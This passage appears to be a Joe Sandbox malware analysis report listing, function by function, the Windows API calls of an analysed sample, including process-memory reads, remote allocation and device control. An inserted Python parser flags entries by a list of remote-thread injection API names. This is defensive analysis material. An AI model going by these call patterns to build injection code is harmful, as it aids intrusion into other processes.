                                                                • Instruction ID: c37ffc29444e33f3ff00cc18c8a21f9aac96c1ba7796cdb64a680e5a8e7d07e7
                                                                • Opcode Fuzzy Hash: 9e4945cc960e750403b6fe6ffcac5c8bcd7cca14399f24ee4e5e51a6ef31b45f
                                                                • Instruction Fuzzy Hash: 76E15CB5E403199FEF00DF95CD86B9EB7B0BB5D305F14812AE518BB382D3B999008B65
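The entries above are the raw material an analyst pivots on: the per-function API list, and the "API ID" similarity key Joe Sandbox derives from it (for the WaitForSingleObject function just listed, "ObjectSingleWait", paired with the referenced string "NtCreateThreadEx", which is what the report's thread-injection signature rests on). The following Python is an added example, not code from Joe Sandbox or from the analysed sample: it parses entries in the text form shown on this page, re-derives the "API ID" key, and flags entries whose API names or referenced string point at remote-thread injection. The tokenisation rule (split CamelCase names, drop the A/W suffix and the Get/Rtl/For/To pieces, group tokens by frequency, sort each group, join groups with "$") is inferred from the keys visible on this page, not taken from Joe Sandbox documentation, and the numeric "API String ID" hash is not reproduced; the STOP_TOKENS and INJECTION_HINTS lists are the editor's choice. The three sample entries are constructed by copying this page's own text.

```python
"""Parse Joe Sandbox 'APIs' function entries and re-derive their 'API ID' key.

Added example, not code from Joe Sandbox or from the analysed sample. The
tokenisation and stop-word rules are INFERRED from the keys visible on this
page, not from Joe Sandbox documentation; the 'API String ID' hash is not
reproduced.
"""
import re
from collections import Counter

# Constructed input: three entries copied verbatim from the report text above.
SAMPLE_ENTRIES = [
    """APIs
  • Part of subcall function 0042E480: Sleep.KERNEL32(80000301,00426E6B,00000001,00000FA0,00000000,80000301), ref: 0042E489
• ControlService.ADVAPI32(00000000,00000004,?,00000000), ref: 004281E9
• CloseServiceHandle.ADVAPI32(00000000), ref: 00428222
• CloseServiceHandle.ADVAPI32(00000000), ref: 0042824E
• CloseServiceHandle.ADVAPI32(00000000,00000000), ref: 004282E1
• CloseServiceHandle.ADVAPI32(00000000), ref: 0042830D
Similarity
• API ID: Service$CloseHandle$ControlSleep
""",
    """APIs
• ___from_strstr_to_strchr.LIBCMT ref: 005004AE
• _strrchr.LIBCMT ref: 005004B9
  • Part of subcall function 00500918: _swscanf.LIBCMT ref: 005009E1
• _sprintf.LIBCMT ref: 005005E8
Similarity
• API ID: ___from_strstr_to_strchr_sprintf_strrchr_swscanf
""",
    """APIs
• WaitForSingleObject.KERNEL32(00000000,FFFFFFFF,?,?,?,?,?,?,00000000), ref: 004AEAFC
Similarity
• API ID: ObjectSingleWait
• String ID: NtCreateThreadEx
""",
]

# One API call line: optional "Part of subcall function XXXXXXXX:" prefix,
# Name.MODULE, optional (args), then "ref: XXXXXXXX".  LIBCMT/NTDLL lines have no args.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-F]{8}):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")
FIELD_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")
CAMEL = re.compile(r"[A-Z][a-z0-9]*")
# Pieces the observed keys drop (A/W suffixes, generic prefixes/connectors).
# Inferred from this page's entries only (assumption); the real list is longer.
STOP_TOKENS = {"A", "W", "Get", "Rtl", "For", "To"}
# Names that, as an API call or as the entry's referenced string, point at
# remote-thread injection (editor's list, not from the report).
INJECTION_HINTS = {"NtCreateThreadEx", "CreateRemoteThread", "WriteProcessMemory",
                   "ReadProcessMemory", "ZwQueryInformationThread"}


def parse_entry(text):
    """Return {'apis': [...], 'fields': {...}} for one 'APIs' entry."""
    apis, fields = [], {}
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = m.group("args")
            apis.append({"name": m.group("name"), "module": m.group("module"),
                         "args": args.split(",") if args else [],
                         "ref": m.group("ref"), "parent": m.group("parent")})
            continue
        f = FIELD_LINE.match(line)   # "• API ID: ...", "• String ID: ..." etc.
        if f:
            fields[f.group("key")] = f.group("val")
    return {"apis": apis, "fields": fields}


def tokens(name):
    """Split a CamelCase API name into words; other names stay as one token."""
    if not name[0].isupper():
        return [name]
    return [t for t in CAMEL.findall(name) if t not in STOP_TOKENS]


def api_id(apis):
    """Group tokens by frequency (descending), sort each group, join with '$'."""
    counts = Counter(t for a in apis for t in tokens(a["name"]))
    by_count = {}
    for tok, n in counts.items():
        by_count.setdefault(n, []).append(tok)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def analyse(text):
    """Parse one entry; return (derived key, matches the report's key?, injection hints)."""
    e = parse_entry(text)
    derived = api_id(e["apis"])
    seen = {a["name"] for a in e["apis"]} | {e["fields"].get("String ID", "")}
    return derived, derived == e["fields"].get("API ID"), sorted(seen & INJECTION_HINTS)


if __name__ == "__main__":
    for entry in SAMPLE_ENTRIES:
        print(analyse(entry))
```

Feeding the whole function listing through `parse_entry` gives a per-function call graph fragment (the `parent` field keeps the "Part of subcall function" nesting) that can be diffed against other reports; re-deriving the key lets you confirm that a function in your own disassembly would land on the same "API ID" bucket before pivoting on it. The rule is a reconstruction: names with embedded acronyms or other dropped prefixes may produce a key that differs from Joe Sandbox's, which is why `analyse` reports whether the derived key matches the one printed in the report.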
                                                                APIs
                                                                  • Part of subcall function 004809EB: ReadProcessMemory.KERNEL32(00000000,004807B0,00000000,00000004,00000000,?,004807B0), ref: 00480A19
                                                                • CallWindowProcA.USER32(00668787,?,?,00000003,00000000), ref: 00482BB1
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CallMemoryProcProcessReadWindow
                                                                • String ID: ,
                                                                • API String ID: 95754710-3772416878
                                                                • Opcode ID: 17bfe06ce3c7fa1266ffe656bb193b554296bb9f2af6dda487940d130ad2ae0d
                                                                • Instruction ID: 496d6bbc2f7389c45bbb32b2e5d8a22688c85449eb1c0765f21ab55a717bde17
                                                                • Opcode Fuzzy Hash: 17bfe06ce3c7fa1266ffe656bb193b554296bb9f2af6dda487940d130ad2ae0d
                                                                • Instruction Fuzzy Hash: 9A91E3B4E00219AFDB00DF95DDC6BAEBBB4FB0D304F10046AE605BB392D6756A50CB65
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 004A0361
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateFile
                                                                • String ID: \\.\\
                                                                • API String ID: 823142352-4229562784
                                                                • Opcode ID: 610cf800ddec33a2bc946201fe505ba8cb29fb1fc5c20fb954b5c6bd1b52cfe8
                                                                • Instruction ID: 4bcb1ec4efeb86d7944cc9a7249a55586db4c25a0c444e08acbc7df7b3b5df18
                                                                • Opcode Fuzzy Hash: 610cf800ddec33a2bc946201fe505ba8cb29fb1fc5c20fb954b5c6bd1b52cfe8
                                                                • Instruction Fuzzy Hash: E9116D70A40308BBDB10DF94DCC2B6DBB74EB1A310F104165EA08AB3C1D2759A109B66
                                                                APIs
                                                                  • Part of subcall function 004641F5: GetCursorPos.USER32(00000000), ref: 0046426D
                                                                • WindowFromPoint.USER32(00000000,?), ref: 004641B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CursorFromPointWindow
                                                                • String ID: 0AF
                                                                • API String ID: 3701901767-2918688355
                                                                • Opcode ID: c4bcccd17560bc7202000e7ac65af2879be068d506580375c1212307478b9ab3
                                                                • Instruction ID: b09f151b188699e6a3c911f4bb5e529282b0bf9f5deb74a391832fd6376813f7
                                                                • Opcode Fuzzy Hash: c4bcccd17560bc7202000e7ac65af2879be068d506580375c1212307478b9ab3
                                                                • Instruction Fuzzy Hash: 1B11FBB5E00208FFDB40DF98DD85BAEBBB4BB09304F1440A9E508BB242E7756B149F56
                                                                APIs
                                                                • VirtualProtect.KERNEL32(00000040,00000001,?,00000000), ref: 00446B8B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProtectVirtual
                                                                • String ID: @
                                                                • API String ID: 544645111-2766056989
                                                                • Opcode ID: 4ba48963fe63cfc7a1084735c6f125a986aa7040cf86a2d7aa2605daa792cfcc
                                                                • Instruction ID: 6eb07efb5ad6addedb7cb1fda6692e56b51acbaa7be99821a0a902c0d6c18e0e
                                                                • Opcode Fuzzy Hash: 4ba48963fe63cfc7a1084735c6f125a986aa7040cf86a2d7aa2605daa792cfcc
                                                                • Instruction Fuzzy Hash: 8B014B75C0020CEBEF009F90D949BDEBBB4EB01315F0080AAE9156A290D3799B64DF86
                                                                APIs
                                                                • PathFindExtensionA.SHLWAPI(I,004909EB,00000000), ref: 00490B00
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExtensionFindPath
                                                                • String ID: I
                                                                • API String ID: 1435214930-989058785
                                                                • Opcode ID: d8e6e0478c6c106476cfd3eed9fd5f934159763827cccc3fce9c4a56f1c02cb2
                                                                • Instruction ID: 490a86f9199fb2a723c32d13d0449bbecefbad8ccfea3ccf1e26948052aeddeb
                                                                • Opcode Fuzzy Hash: d8e6e0478c6c106476cfd3eed9fd5f934159763827cccc3fce9c4a56f1c02cb2
                                                                • Instruction Fuzzy Hash: 39F0E930E00304BFDF50AFA49846B6EBBB8EB09304F00402AB908A7181E5759D10975D
                                                                APIs
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 004C893F
                                                                • VirtualAllocEx.KERNEL32(00000000,00000000,00000400,00001000,00000040), ref: 004C89B0
                                                                  • Part of subcall function 0048195B: VirtualQueryEx.KERNEL32(00000000,00000000,00000000,0000001C,?,?,?,?,?,?,?,004815D7,00000000,00000000,00000008,00000001), ref: 004819AA
                                                                  • Part of subcall function 0048195B: ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000000,00000001), ref: 00481A6C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Virtual$Alloc$MemoryProcessQueryRead
                                                                • String ID:
                                                                • API String ID: 1985374412-0
                                                                • Opcode ID: bb30909247dc7bfde2577c6fee3e488af1747ed5fdf8b99aa3b4b54044086547
                                                                • Instruction ID: d5d576bb244552abd0daebc8195b5e8471d7b838843e27f7cf947a62215a1e1d
                                                                • Opcode Fuzzy Hash: bb30909247dc7bfde2577c6fee3e488af1747ed5fdf8b99aa3b4b54044086547
                                                                • Instruction Fuzzy Hash: FCE12AB4A00309AFDF40DF95C8C1FAE7BB4FF19310F14446AEA05AB352D735AA509B66
                                                                APIs
                                                                • IsWow64Process.KERNEL32(?,00000000), ref: 0043A171
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ProcessWow64
                                                                • String ID:
                                                                • API String ID: 2092917072-0
                                                                • Opcode ID: 5212a08ff060474f4a757daa1f8b56bc25b66de4a5551fa6aa67a74ae486033b
                                                                • Instruction ID: c9c9d6002c463b2ddc451e859978b1fdd8d39d6ee9cc452d94ccfc9351c186f0
                                                                • Opcode Fuzzy Hash: 5212a08ff060474f4a757daa1f8b56bc25b66de4a5551fa6aa67a74ae486033b
                                                                • Instruction Fuzzy Hash: 17E28EB1E403099BEB14DF95D8C6B9DB7B0EB0C304F10502AE609AB386E7799D51CB5A
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000001), ref: 004BE7B2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: [
                                                                • API String ID: 1659193697-784033777
                                                                • Opcode ID: 1d498db6108f5ce5cf27fcf2e51d9992bf005b167fba4a8be8bee5986a0daa84
                                                                • Instruction ID: 3c56a0d11cd2c766c94f5ce059693401d2ef9600e2539bf87b676ab94ee2525e
                                                                • Opcode Fuzzy Hash: 1d498db6108f5ce5cf27fcf2e51d9992bf005b167fba4a8be8bee5986a0daa84
                                                                • Instruction Fuzzy Hash: A8D19970D04208EBEF00DFA6DC85BEEBBB4FF48304F14406AE501B6291D7799A65DB69
                                                                APIs
                                                                • RtlZeroMemory.NTDLL(00000000), ref: 004A243D
                                                                • DeviceIoControl.KERNEL32(?,80002004,00000000), ref: 004A2602
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                 • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                                                                 • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ControlDeviceMemoryZero
                                                                • String ID:
                                                                • API String ID: 3899395806-0
                                                                • Opcode ID: c5c8254d1dbc8a1930e33371473cbf1ecdb35d533f64ed50556c215adafe7ac6
                                                                • Instruction ID: 1379d9694a6a7c4ea619312fcfc19dc4f53adde3b66f966dc6809432d0c6c863
                                                                • Opcode Fuzzy Hash: c5c8254d1dbc8a1930e33371473cbf1ecdb35d533f64ed50556c215adafe7ac6
                                                                • Instruction Fuzzy Hash: 899126B1E4024ADBEF00CF98ECC1B99BBB0FF19314F291065E445AB345D378A920DB26
                                                                APIs
                                                                • RtlZeroMemory.NTDLL(00000000), ref: 004A21C7
                                                                • DeviceIoControl.KERNEL32(?,80002004,00000000), ref: 004A2316
                                                                Similarity
                                                                • API ID: ControlDeviceMemoryZero
                                                                • String ID:
                                                                • API String ID: 3899395806-0
                                                                • Opcode ID: 607c884730c72063ed2b714dfbec4d9dc4e6aa609eb88cc55c6a30480ce735cd
                                                                • Instruction ID: 88b4dc535986b316ac55f8cef019e0e78d4be10e0f0d0bae5b1f65598a20e6c2
                                                                • Opcode Fuzzy Hash: 607c884730c72063ed2b714dfbec4d9dc4e6aa609eb88cc55c6a30480ce735cd
                                                                • Instruction Fuzzy Hash: 0F8109F1A802469BEF00CF98DCC1B99B7B1EF29314F281465E505AB345D378B921DB22
                                                                APIs
                                                                • RtlZeroMemory.NTDLL(00000000), ref: 004A0BFE
                                                                • DeviceIoControl.KERNEL32(?,80002000,00000000), ref: 004A0D47
                                                                Similarity
                                                                • API ID: ControlDeviceMemoryZero
                                                                • String ID:
                                                                • API String ID: 3899395806-0
                                                                • Opcode ID: e6d29720f8726a3870eb82995d9a15f203cdbcd02084dabca70742d32d79f545
                                                                • Instruction ID: 35bc8e8c98ddc9cbf61918b43a30a19bb70cda46dfdcd6dd4577f225d1740349
                                                                • Opcode Fuzzy Hash: e6d29720f8726a3870eb82995d9a15f203cdbcd02084dabca70742d32d79f545
                                                                • Instruction Fuzzy Hash: BE612DB5E40356ABEB00DF98DCC2B9AB7B0FF19314F241465E505AB341E378A921CB66
                                                                APIs
                                                                • RtlZeroMemory.NTDLL(00000000), ref: 004A0E56
                                                                • DeviceIoControl.KERNEL32(?,80002000,00000000), ref: 004A0F9F
                                                                Similarity
                                                                • API ID: ControlDeviceMemoryZero
                                                                • String ID:
                                                                • API String ID: 3899395806-0
                                                                • Opcode ID: c012b28988d9d13af4ed0f8253a96053f7cbae1a570f75d5d19893bb9216046d
                                                                • Instruction ID: 5e66808fcc8ab702745e81185e264776f6ad8174fcd8f79c1605d4a21e0fc504
                                                                • Opcode Fuzzy Hash: c012b28988d9d13af4ed0f8253a96053f7cbae1a570f75d5d19893bb9216046d
                                                                • Instruction Fuzzy Hash: A7613DB5E40346ABEB00DF98DCC2B9AB7B0FF19314F241465E504AB341E378A921CB66
                                                                APIs
                                                                • StrToIntExA.SHLWAPI(?,00000001,00000000), ref: 0041C299
                                                                • StrToIntExA.SHLWAPI(?,00000001,00000000), ref: 0041C317
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 08893684b4849ca80dbbad22bd6d067a222633f0fca4871b230be33d54aa9cd9
                                                                • Instruction ID: 72668c46e8eb6fcd3ae1b17f614d488b73c843bb3906d10a4c9054e3b89be4f5
                                                                • Opcode Fuzzy Hash: 08893684b4849ca80dbbad22bd6d067a222633f0fca4871b230be33d54aa9cd9
                                                                • Instruction Fuzzy Hash: 8E517471E40358BBEB00DF95DCC2BAE7774EB18714F1440A5FA04BA382D7755A508B9A
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000,00000000), ref: 004C225E
                                                                Strings
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID: -
                                                                • API String ID: 1659193697-2547889144
                                                                • Opcode ID: 4a42731ff5698520b666cde0eaa60cc509f57895076ccfd0625658bd3d62fcb8
                                                                • Instruction ID: ac85f96b59c1221f066c0bf1ca88fd8a1bc9f32bbe0cdd95abadec772693d737
                                                                • Opcode Fuzzy Hash: 4a42731ff5698520b666cde0eaa60cc509f57895076ccfd0625658bd3d62fcb8
                                                                • Instruction Fuzzy Hash: DE51E538D04219DBDF989BA4DA48BBEB770FB05305F20456BD811B5251C3FD8A82CB9E
                                                                APIs
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?), ref: 00450AD0
                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00450B97
                                                                Similarity
                                                                • API ID: ByteCharMultiWide
                                                                • String ID:
                                                                • API String ID: 626452242-0
                                                                • Opcode ID: 51fbc00a7369d115f3c0b43c78769c4107f592a6ab683dcd9fa3cc5cde5702f9
